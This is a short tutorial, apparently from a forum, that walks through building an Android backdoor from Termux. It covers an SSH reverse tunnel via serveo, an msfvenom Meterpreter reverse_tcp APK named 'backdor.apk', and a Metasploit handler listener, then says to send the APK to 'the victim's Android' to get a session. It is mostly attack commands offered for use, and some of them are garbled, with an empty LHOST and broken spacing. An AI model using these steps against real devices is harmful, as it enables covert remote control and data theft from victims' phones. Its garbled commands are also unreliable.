Step 1 - to Install openssh in termux type this command.
pkg install openssh
Step 2 - Create a private network via serveo (If failed, use another port)
ssh -R (Port-free): localhost: (Port-free)
Example [::- ssh -R 6898: localhost: 6898
Step 3 - Then, proceed with creating an apk. The process is the same as using ngrok, it's just that the host and port are different.
---Command: ---
msfvenom -p android / meterpreter / reverse_tcp LHOST = LPORT = (PORT_ANDA) R> /sdcard/NAMEAPK.apk
Example [::- msfvenom -p android / meterpreter / reverse_tcp LHOST = LPORT = 6898 R> /sdcard/backdor.apk
Step 4 - Then let's create a tcp reserve network by entering the command below after msf>
msf> use exploit / multi / handler
msf> set android payload / meterpreter / reverse_tcp msf> set LHOST localhost msf
> set LPORT 6898 (must match the port)
msf> exploit -j -z
* LPORT sets can be changed according to the port used in the service, for example 8989.1567, or 4444. And remember, it must be the same.
Step 5 - Send the apk that was made to the victim's Android, install it and open it. Then sessions 1 will be made. If it's already made, then enter the command: (make sure sessions one has been confirmed as open)
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